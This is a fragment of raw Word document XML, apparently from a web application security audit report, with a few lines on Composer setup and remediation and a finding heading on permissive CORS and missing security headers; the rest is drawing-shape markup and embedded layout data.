        <w:t xml:space="preserve">true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which is exactly what Composer's </w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>post-root-package-install</w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> copies </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">into </w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.env</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> automatically. The dead </w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Cart</w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> report deleted; </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>show(</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implemented; the written-but-unrouted </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Consolas" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>cancel(</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routed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="179E9AED" w14:textId="77777777" w:rsidR="00CA733A" w:rsidRDefault="00CA733A">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:ind w:left="24"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="auto"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="07DF913F" w14:textId="4EC2A21F" w:rsidR="001244A6" w:rsidRPr="005C54CB" w:rsidRDefault="001244A6" w:rsidP="001244A6">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V-08 · CORS accepted every origin </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">&amp; </w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>V-09 / V-18 · No security headers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26D3E12D" w14:textId="77777777" w:rsidR="001244A6" w:rsidRPr="005C54CB" w:rsidRDefault="001244A6" w:rsidP="001244A6">
      <w:pPr>
        <w:spacing w:after="192"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A05:2021 · </w:t>
      </w:r>
      <w:r w:rsidRPr="005C54CB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>CWE-942</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CWE-693</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Medium</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2972332C" w14:textId="77777777" w:rsidR="001244A6" w:rsidRPr="005C54CB" w:rsidRDefault="001244A6" w:rsidP="001244A6">
      <w:pPr>
        <w:spacing w:after="147" w:line="310" w:lineRule="auto"/>
        <w:ind w:left="24" w:right="478"/>
        <w:jc w:val="both"/>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3760" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="32CE4F41" wp14:editId="2FC34F66">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>18157</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-22876</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2705100" cy="314325"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="27458" name="Group 27458"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup">
                    <wpg:wgp>
                      <wpg:cNvGrpSpPr/>
                      <wpg:grpSpPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="2705100" cy="314325"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="2705100" cy="314325"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="1993" name="Shape 1993"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="1104900" cy="142875"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="1104900" h="142875">
                                <a:moveTo>
                                  <a:pt x="9525" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="1095375" y="0"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="1098005" y="0"/>
                                  <a:pt x="1100250" y="930"/>
                                  <a:pt x="1102110" y="2791"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="1103970" y="4651"/>
                                  <a:pt x="1104900" y="6896"/>
                                  <a:pt x="1104900" y="9525"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="1104900" y="133350"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="1104900" y="135992"/>
                                  <a:pt x="1103970" y="138224"/>
                                  <a:pt x="1102110" y="140084"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="1100250" y="141945"/>
                                  <a:pt x="1098005" y="142875"/>
                                  <a:pt x="1095375" y="142875"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="9525" y="142875"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="6895" y="142875"/>
                                  <a:pt x="4650" y="141945"/>
                                  <a:pt x="2790" y="140084"/>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96" name="Shape 1996"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="1133475" y="0"/>
                            <a:ext cx="1571625" cy="142875"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="1571625" h="142875">
                                <a:moveTo>
                                  <a:pt x="9525" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="1562100" y="0"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="1564730" y="0"/>
                                  <a:pt x="1566975" y="930"/>
                                  <a:pt x="1568835" y="2791"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="1570695" y="4651"/>
                                  <a:pt x="1571625" y="6896"/>
                                  <a:pt x="1571625" y="9525"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="1571625" y="133350"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="1571625" y="135992"/>
                                  <a:pt x="1570695" y="138224"/>
                                  <a:pt x="1568835" y="140084"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="1566975" y="141945"/>
                                  <a:pt x="1564730" y="142875"/>
                                  <a:pt x="1562100"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04" name="Shape 2004"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="171450"/>
                            <a:ext cx="1371600" cy="142875"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="1371600" h="142875">
                                <a:moveTo>
                                  <a:pt x="0" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="1362075" y="0"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="1364705" y="0"/>
                                  <a:pt x="1366950" y="930"/>
                                  <a:pt x="1368810" y="2791"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="1370670" y="4651"/>
                                  <a:pt x="1371600" y="6896"/>
                                  <a:pt x="1371600" y="9525"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="1371600" y="133350"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="1371600" y="135992"/>
                                  <a:pt x="1370670" y="138224"/>
                                  <a:pt x="1368810" y="140084"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="1366950" y="141945"/>
                                  <a:pt x="1364705" y="142875"/>
                                  <a:pt x="1362075" y="142875"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="0" y="142875"/>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FF6DDF0" id="Group 27458" o:spid="_x0000_s1026" style="position:absolute;margin-left:1.45pt;margin-top:-1.8pt;width:213pt;height:24.75pt;z-index:-251422720" coordsize="2705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&#10;">
                <v:shape id="Shape 1993" o:spid="_x0000_s1027" style="position:absolute;width:11049;height:1428;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="1104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tTwQAAAN0AAAAPAAAAZHJzL2Rvd25yZXYueG1sRE/fa8Iw&#10;EH4X/B/CCXvTdFOcVqN0g429Woe+Hs3ZhjWXkmS1/vdmMPDtPr6ft90PthU9+WAcK3ieZSCIK6cN&#10;1wq+jx/TFYgQkTW2jknBjQLsd+PRFnPtrnygvoy1SCEcclTQxNjlUoaqIYth5jrixF2ctxgT9LXU&#10;Hq8p3LbyJcuW0qLh1NBgR+8NVT/lr1UwD5+LVXGI5ck499afi1dTL7xST5Oh2ICINMSH+N/9pdP8&#10;9XoOf9+kE+TuDgAA//8DAFBLAQItABQABgAIAAAAIQDb4fbL7gAAAIUBAAATAAAAAAAAAAAAAAAA&#10;AAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhAFr0LFu/AAAAFQEAAAsAAAAA&#10;AAAAAAAAAAAAHwEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhAP2761PBAAAA3QAAAA8AAAAA&#10;AAAAAAAAAAAABwIAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAAAwADALcAAAD1AgAAAAA=&#10;" path="m9525,l1095375,v2630,,4875,930,6735,2791c1103970,4651,1104900,6896,1104900,9525r,123825c1104900,135992,1103970,138224,1102110,140084v-1860,1861,-4105,2791,-6735,2791l9525,142875v-2630,,-4875,-930,-6735,-2791l,133350,,9525,2790,2791c4650,930,6895,,9525,xe" fillcolor="#edf2f6" stroked="f" strokeweight="0">
                  <v:stroke miterlimit="83231f" joinstyle="miter"/>
                  <v:path arrowok="t" textboxrect="0,0,1104900,142875"/>
                </v:shape>
                <v:shape id="Shape 1996" o:spid="_x0000_s1028" style="position:absolute;left:11334;width:15717;height:1428;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="15716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i8wgAAAN0AAAAPAAAAZHJzL2Rvd25yZXYueG1sRE/fa8Iw&#10;EH4f+D+EE/Y2Eyd0sxqLdAh7GqwOfD2asyk2l9pE2/33y2Cwt/v4ft62mFwn7jSE1rOG5UKBIK69&#10;abnR8HU8PL2CCBHZYOeZNHxTgGI3e9hibvzIn3SvYiNSCIccNdgY+1zKUFtyGBa+J07c2Q8OY4JD&#10;I82AYwp3nXxWKpMOW04NFnsqLdWX6uY0GPUSZcnqejt+kLKr/vSW2ZPWj/NpvwERaYr/4j/3u0nz&#10;1+sMfr9JJ8jdDwAAAP//AwBQSwECLQAUAAYACAAAACEA2+H2y+4AAACFAQAAEwAAAAAAAAAAAAAA&#10;AAAAAAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQBa9CxbvwAAABUBAAALAAAA&#10;AAAAAAAAAAAAAB8BAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQAAH+i8wgAAAN0AAAAPAAAA&#10;AAAAAAAAAAAAAAcCAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAMAAwC3AAAA9gIAAAAA&#10;" path="m9525,l1562100,v2630,,4875,930,6735,2791c1570695,4651,1571625,6896,1571625,9525r,123825c1571625,135992,1570695,138224,1568835,140084v-1860,1861,-4105,2791,-6735,2791l9525,142875v-2630,,-4875,-930,-6735,-2791c930,138224,,135992,,133350l,9525c,6896,930,4651,2790,2791,4650,930,6895,,9525,xe" fillcolor="#edf2f6" stroked="f" strokeweight="0">
                  <v:stroke miterlimit="83231f" joinstyle="miter"/>
                  <v:path arrowok="t" textboxrect="0,0,1571625,142875"/>
                </v:shape>
                <v:shape id="Shape 2004" o:spid="_x0000_s1029" style="position:absolute;top:1714;width:13716;height:1429;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="13716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Lo5xAAAAN0AAAAPAAAAZHJzL2Rvd25yZXYueG1sRI/RagIx&#10;FETfC/5DuEJfimZbrJTVKFZa7WtdP+Cyue5GNzfLJmr0640g+DjMzBlmOo+2ESfqvHGs4H2YgSAu&#10;nTZcKdgWv4MvED4ga2wck4ILeZjPei9TzLU78z+dNqESCcI+RwV1CG0upS9rsuiHriVO3s51FkOS&#10;XSV1h+cEt438yLKxtGg4LdTY0rKm8rA5WgVvxdgs9DWuP0dx+3P9XhUHE/dKvfbjYgIiUAzP8KP9&#10;pxUk4gjub9ITkLMbAAAA//8DAFBLAQItABQABgAIAAAAIQDb4fbL7gAAAIUBAAATAAAAAAAAAAAA&#10;AAAAAAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhAFr0LFu/AAAAFQEAAAsA&#10;AAAAAAAAAAAAAAAAHwEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhAFXcujnEAAAA3QAAAA8A&#10;AAAAAAAAAAAAAAAABwIAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAAAwADALcAAAD4AgAAAAA=&#10;" path="m,l1362075,v2630,,4875,930,6735,2791c1370670,4651,1371600,6896,1371600,9525r,123825c1371600,135992,1370670,138224,1368810,140084v-1860,1861,-4105,2791,-6735,2791l,142875,,xe" fillcolor="#edf2f6" stroked="f" strokeweight="0">
                  <v:stroke miterlimit="83231f" joinstyle="miter"/>
                  <v:path arrowok="t" textboxrect="0,0,137160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4784" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="72C9CD46" wp14:editId="42D4F2BC">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>3342382</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-22876</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2809876" cy="314325"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="27460" name="Group 27460"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup">
                    <wpg:wgp>
                      <wpg:cNvGrpSpPr/>
                      <wpg:grpSpPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="2809876" cy="314325"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="2809876" cy="314325"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="1999" name="Shape 1999"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="38100" y="0"/>
                            <a:ext cx="2152650" cy="142875"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="2152650" h="142875">
                                <a:moveTo>
                                  <a:pt x="9525" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="2143125" y="0"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="2145755" y="0"/>
                                  <a:pt x="2148000" y="930"/>
                                  <a:pt x="2149860" y="2791"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="2151719" y="4651"/>
                                  <a:pt x="2152649" y="6896"/>
                                  <a:pt x="2152650" y="9525"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="2152650" y="133350"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="2152649" y="135992"/>
                                  <a:pt x="2151719" y="138224"/>
                                  <a:pt x="2149860" y="140084"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="2148000" y="141945"/>
                                  <a:pt x="2145755" y="142875"/>
                                  <a:pt x="2143125"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02" name="Shape 2002"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="2371726" y="0"/>
                            <a:ext cx="438150" cy="142875"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="438150" h="142875">
                                <a:moveTo>
                                  <a:pt x="9525" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="438150" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="438150" y="142875"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="9525" y="142875"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="6894" y="142875"/>
                                  <a:pt x="4649" y="141945"/>
                                  <a:pt x="2789" y="140084"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="0" y="133351"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="0" y="9524"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="2789" y="2791"/>
                                </a:ln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07" name="Shape 2007"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="171450"/>
                            <a:ext cx="581025" cy="142875"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="581025" h="142875">
                                <a:moveTo>
                                  <a:pt x="9525" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="571500" y="0"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="574130" y="0"/>
                                  <a:pt x="576375" y="930"/>
                                  <a:pt x="578235" y="2791"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="580095" y="4651"/>
                                  <a:pt x="581025" y="6896"/>
                                  <a:pt x="581025" y="9525"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="581025" y="133350"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="581025" y="135992"/>
                                  <a:pt x="580095" y="138224"/>
                                  <a:pt x="578235" y="140084"/>
                                </a:cubicBezTo>
                                <a:cubicBezTo>
                                  <a:pt x="576375" y="141945"/>
                                  <a:pt x="574130" y="142875"/>
                                  <a:pt x="571500"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2AD7D3F" id="Group 27460" o:spid="_x0000_s1026" style="position:absolute;margin-left:263.2pt;margin-top:-1.8pt;width:221.25pt;height:24.75pt;z-index:-251421696" coordsize="28098,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nswQAAJUVAAAOAAAAZHJzL2Uyb0RvYy54bWzsWEtv20YQvhfofyB4r8WnSAqWA7SOfSna&#10;IEl/wHq1lAjwBS4t2f31nZ3lLLmk4jpOkPYgHURyd2Z25psnef3uqSqdo+hk0dRb17/yXEfUvNkV&#10;9X7r/vX57pfUdWTP6h0rm1ps3Wch3Xc3P/90fWo3ImgOTbkTnQNCark5tVv30PftZrWS/CAqJq+a&#10;VtSwmTddxXp47ParXcdOIL0qV4HnrVenptu1XcOFlLB6qzfdG5Sf54L3f+a5FL1Tbl3Qrcf/Dv8f&#10;1P/q5ppt9h1rDwUf1GBv0KJiRQ2HGlG3rGfOY1csRFUF7xrZ5P0Vb6pVk+cFF2gDWON7M2vuu+ax&#10;RVv2m9O+NTABtDOc3iyW/3G879pP7YcOkDi1e8ACn5QtT3lXqSto6TwhZM8GMvHUOxwWg9TL0mTt&#10;Ohz2Qj8Kg1hjyg8A/IKNH96/zLiiY1eWMqcWwkOOCMhvQ+DTgbUCgZUbQOBD5xQ7iN4sy1ynZhXE&#10;KVI4uILAIJ2BSW4kIHYGozD1PQizMzj5cbCOYUvh5EdBmiBOxly24Y+yvxcNIs6Ov8teh+aO7tiB&#10;7vhTTbcdBPiLod2yXvEpVdWtcwKXkSoHo4narpqj+NwgYa/8lsXgSmMJKDoSlPWUMACv+zNaouCP&#10;DwX/Vfw9o4+TeCIbVMMTQVDqDfBl4ZCbZitL1xrZIMl8FWOgki3efiLG2E98cCvAHq1jZBzPA59E&#10;em+dZmsduIZP+wv4EIlzB5KVSxY/DEPwtmYisi/oZ3TwwzjLgpkWRns/TIMgsncjA4ofeV6Ku6+E&#10;ZYTaj/wsGrKWLImMh8ZYHWEb/T3uLo4lq7VIE00WB9GcQwY8omNk5CANwJE6FM6onmS09VWAqHhT&#10;MbJEmdbnvqH1iaNtM8g4DYAmn4QSbdtMU+J5TJKOizgmm78qMwyIs1QzuFsJaPxHQW2rzctGCh3t&#10;qsxgcprSg6ExFreyVlUI8OAMGn5esh47Z1X0MAmURQVOCBJVByh7QJqq/7rk4l3/XApVqcr6o8ih&#10;dmN3Uguy2z/8VnbOkal+jz8Uzsr2wIbVQe5AiqqiHMWfF2VpRPrIaol8f3sX3GGhAKMGYsUncNQw&#10;nJ7m5IM2et6Arg1G09QB/IYJT27q3vDXMCuhmhNr1e1Ds3vGTo2AQENUPfsHdEaYtAK7M+IKOEgd&#10;Dx303ztjECZ+EsCgAEk2RBbNEBF0zf9HayRNvlNnJHFkMvicsp6uOt8nhGO1+yK1ycWztHZiavmQ&#10;05Eub2byGGvp0AHP1dJUN8cXmottx6QmUosmArpOCxwYQi2LtumqyYJk0GBS2YjinJ0RtfNlTdP2&#10;X2rapaYN0z5UsGRR0xJVdV9d04ZwT/xIz3pQ0oe3mxjeA9RI/N9P+6TJdyppcQKlWts9Nmg93